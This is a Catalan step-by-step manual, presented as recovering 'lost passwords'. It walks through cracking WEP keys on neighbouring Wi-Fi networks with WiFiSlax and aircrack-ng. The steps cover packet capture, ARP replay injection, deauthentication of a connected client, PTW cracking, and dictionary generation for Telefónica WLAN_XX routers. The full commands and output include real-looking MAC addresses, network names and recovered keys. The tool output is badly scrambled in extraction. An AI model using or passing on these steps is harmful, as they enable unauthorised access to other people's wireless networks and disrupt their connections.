Manual per trobar contrasenyes perdudes

Anuncio
Manual per trobar contrasenyes perdudes
Arrencar amb CD de WiFiSlax (http://www.wifislax.com/principal/descargas.php). Triga uns
4'....paciència....
Entrar amb root/toor
Arrencar Xwindows : startx
Si fallés el mode gràfic es poden obrir consoles de text (Alt + Fn)
Connectar wireless USB
Obrir 3 terminals:
Terminal 1
* Comprovar wireless USB:
wifislax ~ # iwconfig
lo
no wireless extensions.
eth0
no wireless extensions.
rausb0
RT2500USB WLAN
Link Quality:0 Signal level:136 Noise level:113
Rx invalid nwid:0 invalid crypt:0 invalid misc:0
* Veure xarxes disponibles:
wifislax ~ # airodump-ng rausb0
CH
7 ][ Elapsed: 8 s ][ 2008-03-18 19:30
BSSID
00:0F:21:31:13:DB
00:19:E3:FA:6F:83
00:60:B3:FC:2B:71
00:11:95:9E:D4:5C
00:18:9B:4D:F0:20
00:01:38:A7:3F:73
00:02:CF:55:9C:37
00:60:B3:52:9D:3B
00:1A:2B:69:4A:95
00:A0:C5:81:C2:A8
00:1A:92:6B:B7:66
00:14:7F:31:DF:5F
PWR
Beacons
41
38
70
42
54
37
38
50
36
40
35
62
2
2
7
4
6
7
6
6
3
5
4
8
#Data, #/s
BSSID
STATION
00:1A:2B:69:4A:95
00:1C:BF:2F:5C:02
CH
MB
ENC
CIPHER AUTH ESSID
6
5
9
6
11
6
4
9
3
7
1
1
48
54.
54.
54.
48
54.
54.
54.
54
11
48
48
WEP
WPA2
WEP
OPN
WEP
WEP
WEP
WEP
WEP
WEP
OPN
WPA
WEP
CCMP
WEP
0
0
0
0
0
0
0
0
39
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
PWR
Lost
Packets
55
201
39
PSK
WEP
WEP
WEP
WEP
WEP
WEP
TKIP
PSK
anna
J+R
WLAN_1F
Internet_WiFi
lucas
WLAN_74
WLAN_C6
WLAN_A2
WLAN_91
Xarxa4
WebSTART
SpeedTouchD599U
Probes
* Busquem contrasenya de WLAN_91. Hem de tenir una estació associada (BSSID STATION).
Posem el canal perquè el esnifat sigui mes optim. 'captura' es el fitxer de captures:
wifislax ~ # airodump-ng rausb0 --bssid 00:1A:2B:69:4A:95 --channel 3 -w captura
Terminal 2
* Generar trafic:
wifislax ~ # aireplay -3 -b 00:1A:2B:69:4A:95 -h 00:1C:BF:2F:5C:02 -x 512 rausb0
Salvando respuestas ARP en replay_arp-0318-193958.cap
Debes iniciar también el airodump para capturar paquetes.
leídos 3403 paquetes (conseguidas 0 respuestas ARP), enviados 0 packets...
* S'han d'aconseguir ARP. Si no obtenim cap en un temps prudencial passem a l'atac.....
Terminal 3
* Desautentificar per aconseguir ARP (Només si no aconseguim ARP):
wifislax ~ # aireplay -0 5 -a 00:1A:2B:69:4A:95 -c 00:1C:BF:2F:5C:02 rausb0
* Obtenir clau:
wifislax ~ # aircrack-ng -z captura*.cap
Opening captura-01.cap
Opening captura-02.cap
Read 41276 packets.
#
BSSID
ESSID
Encryption
1
00:1A:2B:69:4A:95
WLAN_91
WEP (22664 IVs)
Choosing first network as target.
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 22826 ivs.
Aircrack-ng 0.9.1 r511
[00:01:26] Tested 190080/1400000 keys (got 35399 IVs)
KB
0
1
2
3
4
5
6
7
8
9
10
11
12
depth
0/ 1
0/ 1
0/ 1
0/ 1
0/ 9
10/ 11
1/ 2
3/ 6
5/ 8
0/ 2
0/ 2
0/ 5
0/ 1
byte(vote)
43( 198) A9(
30( 196) 1E(
30( 192) 64(
31( 202) 49(
44( 170) 33(
32( 157) 19(
30( 186) 77(
30( 161) 8D(
17( 162) 87(
39( 180) C5(
45( 180) AA(
39( 181) B4(
31( 179) F9(
170)
164)
169)
172)
169)
156)
167)
160)
160)
169)
172)
173)
166)
B0(
29(
6F(
F5(
3E(
20(
F7(
F4(
DC(
A5(
B7(
F0(
B7(
169)
161)
169)
165)
164)
156)
162)
160)
160)
165)
168)
170)
165)
6E(
B2(
1B(
FB(
F2(
D2(
D7(
07(
41(
A6(
57(
6C(
E5(
168)
161)
164)
165)
162)
156)
160)
158)
159)
163)
165)
170)
164)
93(
A2(
54(
71(
4A(
01(
DA(
92(
B8(
D6(
07(
75(
4A(
167)
159)
163)
162)
161)
155)
159)
158)
158)
163)
164)
170)
163)
AF(
F5(
A5(
05(
20(
EC(
01(
D5(
1A(
26(
2B(
C9(
BB(
166)
159)
161)
160)
161)
155)
158)
158)
157)
162)
164)
163)
162)
KEY FOUND! [ 43:30:30:31:44:32:30:30:32:39:45:39:31 ] (ASCII: C001D20029E91 )
Decrypted correctly: 100%
* i ja la tenim!!!!!
Manual per trobar contrasenyes de timofònica
ESSID WLAN_XX
* Buscar xarxes:
wifislax ~ # airodump-ng rausb0
* Recuperar ivs:
wifislax ~ # airodump-ng rausb0 --bssid 00:60:B3:EC:E6:D9 --channel 9 -w captura
CH
9 ][ Elapsed: 1 min ][ 2008-03-28 17:02
BSSID
PWR RXQ
00:60:B3:EC:E6:D9
BSSID
35
Beacons
96
#Data, #/s
CH
2
9
309
STATION
PWR
0
Lost
MB
ENC
54. WEP
Packets
CIPHER AUTH ESSID
WEP
WLAN_3D
Probes
* Generar diccionari:
wifislax ~ # wlandecrypter 00:60:B3:EC:E6:D9
WLAN_3D diccionari
wlandecrypter 0.5 - (c) 2006 nilp0inter2k6_at_gmail.com
------------> http://www.rusoblanco.com <-----------[+]
[+]
[+]
[+]
[+]
BSSID: 00:60:B3:EC:E6:D9
Modelo: Z-com
ESSID: WLAN_3D
Fichero de claves: diccionari
Fichero guardado
* Obtenir clau:
wifislax ~ # aircrack-ng -w diccionari captura*.cap
Aircrack-ng 0.9.1 r511
[00:00:03] Tested 21916 keys (got 8 IVs)
KB
0
1
2
3
4
5
6
7
8
9
10
11
12
depth
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
0/ 0 00(
byte(vote)
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0) 00( 0) 00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
00(
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
0)
KEY FOUND! [ 5A:30:30:31:33:34:39:35:35:39:42:33:44 ] (ASCII: Z001349559B3D )
Decrypted correctly: 100%
* i ja la tenim!!!!!
Descargar